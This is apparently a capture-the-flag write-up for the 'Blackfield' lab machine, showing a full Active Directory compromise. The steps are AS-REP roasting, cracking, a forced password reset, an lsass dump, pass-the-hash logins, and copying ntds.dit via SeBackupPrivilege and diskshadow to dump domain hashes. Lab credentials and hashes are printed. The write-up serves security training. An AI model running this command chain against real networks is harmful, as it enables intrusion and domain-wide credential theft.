# Blackfield

## Nmap

```
nmap 10.10.10.192 -p- -sS -sV         

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-10 21:09:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```

{% hint style="info" %}
Add "10.10.10.192 blackfield.local" to /etc/hosts.
{% endhint %}

Starting out we hit kerberos on port 88 against a large username list. Pulling the known account name of *<Support@blackfield.local>*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-42ce76f477f6227fccd5bb93e080e2c78eecaab8%2Fimage.png?alt=media)

With no further user accounts discovered we can check null credentials against SMB with `smbmap`.

```
smbmap -u null -p "" -H 10.10.10.192 -P 445 2>&1
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fee0301ab52d2f340762cbc7860b659cf0f4da47%2Fimage.png?alt=media)

We have some non default shares. The `profiles$` share is of interest as we have *READ ONLY* access to the share.

Using the smbclient command below, we can recursively download all files and folders in the share.

```
smbclient '\\10.10.10.192\profiles$' -N -c 'prompt OFF;recurse ON; mget *' 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-72566e18b3473c3eac31a5e03bbbf317b43c77c1%2Fimage.png?alt=media)

None of the directories contain any files it seems. We do however, have folders named after potential users. Utilizing this information we can print the direct list to file.

```bash
find . -maxdepth 1 -type d -printf '%f\n' > users.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d2bbef4042c7cb510320719c397b1131cef5fe47%2Fimage.png?alt=media)

Against kerbrute we can check for which users exists.

```bash
python3 kerbrute.py -users '~/blackfield/users.txt' -domain 'blackfield.local' -dc-ip '10.10.10.192' -outputusers '~/known_users.txt'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-19db43faca636acc170308c1358a8add77b47c6f%2Fimage.png?alt=media)

We now have a confirmed user list:

```
svc_backup
audit2020
support
```

Where the user support has "Do not require pre-authentication" enabled in Active Directory. With this, we can potentially pull the kerberos hash with Impacket's `GetNPUsers.py`.

```
python2 GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -request -usersfile ~/known_users.txt -format john -outputfile ~/hashes.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aaf7a124cfc2b443dd0b8ac8ad6f95e7cce3b792%2Fimage.png?alt=media)

Reading the output file we see our confirmed hash for the *support* user.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9f89452929745af3464a7b0371657a75806bb915%2Fimage.png?alt=media)

```
$krb5asrep$support@BLACKFIELD.LOCAL:e4be5339949e37a4049a10b4a175f5e1$0a4606e9cc22be8bf26959b078d7d94703674c0df20808c3d93b2d09d0bacbaef84cc3b1fefd4384b545ce8d109b503db0e4705e4a94d0b8c681ec8a44cbdda2cadd94ea65c94f4e0ac956743ad3dbc2696cf5ad1fcb4aedc95bc8e5e7686311f7471a3455f59f422a4fa99b2850cdab872f065f680239ddc5007f2f1866d705808262203e50ccca81a32ffa1fbcdab215c29ada83678e4298a8ab92e1bf871ae507963f68453289a702bfa9df8ab2b4b73cc0cf07b95d4fb4c0f765f5b4712ce871eb9bd641e41df7efc7243b5e3cc8e92dcc2778c3b25756ebfbef86741840357839d0926f731a6d64bf335c3f675c237bc650
```

Which, can be cracked wsith `John` against the *rockyou.txt* password list.

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.hash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aec93f81d551a29e3d3e210c7df01288abb4787a%2Fimage.png?alt=media)

Revealing the users password.

Credentials:

```
support:#00^BlackKnight
```

Checking with `crackmapexec` shows the credentials are valid.

```bash
crackmapexec smb '10.10.10.192' -u 'support' -p '#00^BlackKnight'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a62ce02b627b5507b6049a935ce46bde7cd36b3b%2Fimage.png?alt=media)

However, at the point we do not have code execution over SMB. We are not a member of "Remote Management Users" and RDP is not running.

What we can utilize however, is `bloodhound` to pull domain informaiton externally using Bloodhound.py.

**GitHub:** <https://github.com/fox-it/BloodHound.py>

```bash
python2 bloodhound.py -u 'support' -p '#00^BlackKnight' -ns '10.10.10.192' -d 'blackfield.local' -gc 'dc01.blackfield.local'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-84a413e410a5ab41c8b7aec7342bb722c2d4ae51%2Fimage.png?alt=media)

After uploading the results to bloodhound we then further investigate our currently owned user *support*. Looking at the node information we see we have deriative permissions on the "ForceChangePassword" attribute over the user *Audit2020*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d8e917a5be27fd4b008faa7a3522cec06de00ea1%2Fimage.png?alt=media)

We can force a password change externally with rpcclient as shown below.

```bash
# setuserinfo2 username level password [password_expired]

rpcclient -U support //10.10.10.192 
setuserinfo2 audit2020 23 'Password123'
```

After the password change we can confirm the credentials with `crackmapexec`.

```bash
crackmapexec smb 10.10.10.192 -u 'audit2020' -p 'Password123' --shares
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6337f50e326b2d820b39c2dd426b6f58cea4a2e7%2Fimage.png?alt=media)

From our previous findings we know that a forensic SMB share exists. The user *audit2020* has access to the share.

```bash
smbclient -U 'audit2020' '\\10.10.10.192\forensic'  -c 'prompt OFF;recurse ON; mget *' 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b4672d2b2f3422cbc1c1c7b227635856b7f383f%2Fimage.png?alt=media)

Looking inside the memory\_analysis folder, the most interest standout file would be lsass.dmp. Hopefully we can pull some user hashes or password from this.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3b03f4891581d4dc8a85a2fd1557def20f7a17c4%2Fimage.png?alt=media)

`lsass.dmp` is dump file format. The best dedicated tool for this is likely `pypykatz`.

**Github:** <https://github.com/skelsec/pypykatz>

**Install**

```bash
# Clone repo
git clone https://github.com/skelsec/pypykatz.git
# Install
pip3 install pypykatz
```

The following syntax can be used to analysis the `lsass.dmp` file.

```bash
pypykatz lsa minidump '~/blackfield/memory_analysis/lsass.DMP'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d959c14cab8d80381dfa1b54d1b9087482689978%2Fimage.png?alt=media)

As shown above we can see the NT hash for the account *svc\_backup*.

As we know from earlier enumeration, this user is a member of the "Remote Management Users" group. As such, we can use `Evil-WinRM` to login with the account hash.

```bash
evil-winrm -i '10.10.10.192' -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-88cf62af32a064c1263919a269e4b970eb098e2f%2Fimage.png?alt=media)

We know this account is already a member of the "Back Operators" group. Let's double check we have the "SeBackupPrivilege" privilege assigned to us so, we can perform privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1c26a6e229ff117b12fd6598a21013c98cf496cb%2Fimage.png?alt=media)

This privilege grants us the ability to create backups of files on the system. Knowing this, a high value file would be the `ntds.dit` file which is a database of hashes for domain objects / users. As the ntds.dit file is in constant use we will be unable to create a backup using normal methods as the system will lock the file.

What we can do instead is create a **Distributed Shell File** (DSH). This file will contain the appropriate commands for us to run the diskshadow utility against the C: drive and ultimately, the ntds.dit file.

I have previously covered this technique before as linked below.

{% content-ref url="../../tryhackme/linux/fusion-corp" %}
[fusion-corp](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/fusion-corp)
{% endcontent-ref %}

First created a file called `viper.dsh` on the attacking machine. Then insert the following contents:

```
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:
```

Once completed use the command `unix2dos` to convert the file to DOS format.

```
unix2dos viper.dsh
```

Then on the target system create a directory called 'temp' in `c:\temp.` After this upload the `viper.dsh` file.

From here run the following commands:

```
diskshadow /s viper.dsh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35e197ebacde0d1eed1fbda10a6dffc95f4d0638%2Fimage.png?alt=media)

```
robocopy /b x:\windows\ntds . ntds.dit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2626efb3d288248630a1477114bdceb349e4a109%2Fimage.png?alt=media)

From here we need to extract the SYSTEM hive which will be required for extracting the hashes with Impacket later.

```
reg save hklm\system c:\Temp\system
```

From here we can use the download command to download the `ntds.dit` and `system` hive file.

```
download ntds.dit
download system
```

Now, over on the attacking system we can use Impacket's `secretsdump.py` to extract the domain account hashes.

```bash
python2 'secretsdump.py' -ntds 'ntds.dit' -system 'system' local 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5c4b99546134cbb74bbb78a8f63811a2200a1b0%2Fimage.png?alt=media)

With the administrators NTLM hash we can log into the Domain Controller with `Evil-WinRM`.

```bash
evil-winrm -i '10.10.10.192' -u 'administrator' -H '184fb5e5178480be64824d4cd53b99ee'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ded1405dbd763194d6816175ff1b2cab91bcc72a%2Fimage.png?alt=media)